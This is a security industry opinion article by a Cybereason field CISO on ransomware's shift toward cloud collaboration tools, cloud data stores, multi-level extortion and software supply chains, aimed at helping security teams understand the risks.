Ransomware Shifting to the Cloud

In the last few years, ransomware attacks have grown considerably. With 75% of organizations being attacked, it seems likely that we'll see a saturation point soon. And attackers have not been resting on their laurels. On the contrary, they have continued to evolve ransomware and are already in the fourth generation of this malicious software.

Ransomware has evolved far beyond the simple concept of encrypting data for ransom. Today, ransomware involves multiple levels of extortion, blackmailing both businesses and individuals not to post or resell data to others.  

At the same time, we have seen ransomware groups conduct richer analyses of the data, which flags one very key point businesses should be cognizant of: Ransomware increasingly will lie dormant for a period. This is required to be able to move laterally and gather data across your networks and be able to analyze that data silently. This has extended from looking at your data files to looking at all data. For example, we often now see ransomware used to grab credentials to allow further access, be sold back into the cybercrime ecosystem, or leveraged to get a bigger ransom.    

It may seem that it's not just the volume of ransomware that feels like it's reaching saturation but also the capabilities. Many ransomware attacks no longer deserve that name, as they are much broader. They should have a new name, such as blended ransomware or cyber data crimes.

However, the scope of our IT world continues to change rapidly, opening up new areas for attackers to saturate. Before, such attacks moved laterally across your network. However, with most organizations now leveraging cloud-based collaboration tools such as Office 365, G-Suite, or Slack, it's natural that the adversaries must follow.  

We are already seeing ransomware that scans for cloud-based collaboration points. And while you may think the risks are the same, that's not the case. In most organizations, credential management has taken a step backward as not every SaaS tool neatly slots into your single sign-on processes. Likewise, shadow cloud IT is making it tougher for security teams to keep track of what they have to protect.  

At the same time, cloud-based SaaS resources can create a double-edged sword. On the one hand, it is not always clear who owns the problem and solutionthe supplier or the end customer. On the other hand, evolving capabilities can create headaches for security teams to understand each capability's new risks and decide if they want to leverage them. Arbitrarily it will either be on or off by default, so the security team must be quick to validate if that's the right decision for them. The risk profile is ever-evolving; if you aren’t keeping pace, you can be sure the adversaries are.

It's not just SaaS. We see adversaries investigating what data stores you have with both typical cloud providers and some of the other key SI and hosting providers. What we have seen to date is that in our rush to the cloud, the maturity of cloud configurations is typically not as secure as our historical on-prem data stores. We simply don’t have the experience in an inherently more open and complex space. 

The most simple questions about who is responsible for what parts of security may sound simple, but in reality, the application is complex. Cloud providers secure your infrastructure, but you secure the data and applications. And in recent years, we’ve seen the introduction of bring-your-own encryption keys simply to ensure only business staff and not the cloud provider can access the data. The bottom line is the cloud is far more complex, which allows for a greater degree of security errors and new opportunities for the adversary.

While we are used to the risks introduced by cloud vulnerabilities and misconfigurations, we are less used to the pace of change in the cloud. Be it shadow IT, DevOps teams, or one of the many other possibilities, cloud IT can be extremely dynamic. Can you apply the correct security controls if you don’t know it's there? Many organizations are feeling the pain that limitless IT in the cloud brings when they get the usage bills, and only then do they start to validate what's required and what simply was never removed after the project was completed.

I would also be remiss if I didn’t mention the supply chain in this ransomware evolution discussion. The complexity continues to grow as the world embraces the notion of DevOps and agile development pipelines. It's not just about who owns which responsibilities at what level but also about where things came from. For example, what libraries are being leveraged? We have seen some open source code repositories, such as GitHub, contain low-quality or malicious source code. When your development teams or suppliers' development teams are re-using code, you need to verify the integrity of the code to ensure you aren’t embedding the back door for the adversaries to leverage. As the very notion of DevOps is continual development, this becomes an ongoing task, a pace that security teams haven’t been used to.

Spanning across all of these areas is understanding where your data is. In the run-up to the European General Data Protection Regulation (GDPR) and other data privacy regulations worldwide, companies invested a lot of time and energy to identify where sensitive data was and who had access to it. The rapid adoption of the cloud has pushed many backward, with data becoming more fragmented and scattered across the growing array.  

This creates a challenge on both sides. On the one hand, it's now easier than ever to have multiple copies of the same data, so being able to recover data can become less of a challenge. However, I suspect we will see the next evolution of ransomware focus more on the extortion and reselling aspects of ransoming rather than publishing sensitive data they have obtained. The challenge for each business will be to keep track of where data is and who or what resources can access it.

I wish I could say that we have gone through the peak of ransomware attacks, but what is clear is that adversaries have continually adapted their attacks to increase revenue opportunities and cash in on evolving security weak points. Our journey to the cloud is still in its relative infancy. While it empowers data resilience against traditional ransomware attacks, its scale, scope, and complexities create many new threats for security teams to manage and risks for every business to comprehend. 

It is critical that we go in with open eyes and accept that we will make mistakes but learn and adapt quickly. This way, we can be honest and focus on the key risk areas. 

I remain curious if we will keep calling ransomware by the same name. My concern is the potential false confidence it builds where through time and investments, we believe we have solved the problem we know, but the broader business can be blissfully unaware of just how far the threat has evolved and changed. Like the chameleon, ransomware continues to adapt to its environments.

Greg Day
About the Author

Greg Day

Greg Day is a Vice President and Global Field CISO for Cybereason in EMEA. Prior to joining Cybereason, Greg held CSO and CTO positions with Palo Alto Networks, FireEye and Symantec. A respected thought leader and long-time advocate for stronger, more proactive cybersecurity, Greg has helped many law enforcement agencies improve detection of cybercriminal behavior. In addition, he previously taught malware forensics to agencies around the world and has worked in advisory capacities for the Council of Europe on cybercrime and the UK National Crime Agency. He currently serves on the Europol cyber security industry advisory board.